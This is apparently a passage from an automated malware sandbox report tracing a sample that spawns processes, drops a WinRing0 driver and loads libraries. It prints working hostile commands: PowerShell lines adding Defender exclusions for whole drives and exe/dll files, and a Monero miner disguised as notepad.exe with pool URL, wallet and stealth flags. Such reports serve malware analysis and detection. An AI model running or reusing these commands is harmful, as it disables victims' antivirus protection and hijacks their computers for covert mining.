            Source: unknownProcess created: C:\Users\user\Desktop\9d2h99wrj.exe "C:\Users\user\Desktop\9d2h99wrj.exe"
            Source: C:\Users\user\Desktop\9d2h99wrj.exeProcess created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\Desktop\9d2h99wrj.exe"
            Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
            Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\notepad.exe C:\Windows/System32\notepad.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:443 --user=46TNT2eMYP5X7V1Kh4SRr8Z7Qb1jsLm74TXDLNkb5M6VgoazSKmN1kydrrcZZ9eqTF7UYDH7NsEbJFLfe7DDkAfK5Nc1VLK --pass=Paizley2019 --cpu-max-threads-hint=20 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=70 --cinit-stealth
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
            Source: C:\Users\user\Desktop\9d2h99wrj.exeProcess created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\Desktop\9d2h99wrj.exe"Jump to behavior
            Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exitJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\notepad.exe C:\Windows/System32\notepad.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:443 --user=46TNT2eMYP5X7V1Kh4SRr8Z7Qb1jsLm74TXDLNkb5M6VgoazSKmN1kydrrcZZ9eqTF7UYDH7NsEbJFLfe7DDkAfK5Nc1VLK --pass=Paizley2019 --cpu-max-threads-hint=20 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=70 --cinit-stealth Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" Jump to behavior
            Source: C:\Users\user\Desktop\9d2h99wrj.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\notepad.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\notepad.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\notepad.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\notepad.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\notepad.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\notepad.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\notepad.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\notepad.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\notepad.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\notepad.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\notepad.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\notepad.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\System32\notepad.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\System32\notepad.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\System32\notepad.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\System32\notepad.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\System32\notepad.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\notepad.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\notepad.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\notepad.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\notepad.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\conhost.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: 9d2h99wrj.exeStatic file information: File size 31161344 > 1048576
            Source: 9d2h99wrj.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x1db5e00
            Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: WR64.sys.1.dr

            Persistence and Installation Behavior

            barindex
            Source: C:\Windows\System32\conhost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sysJump to behavior
            Source: C:\Windows\System32\conhost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sysJump to dropped file

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
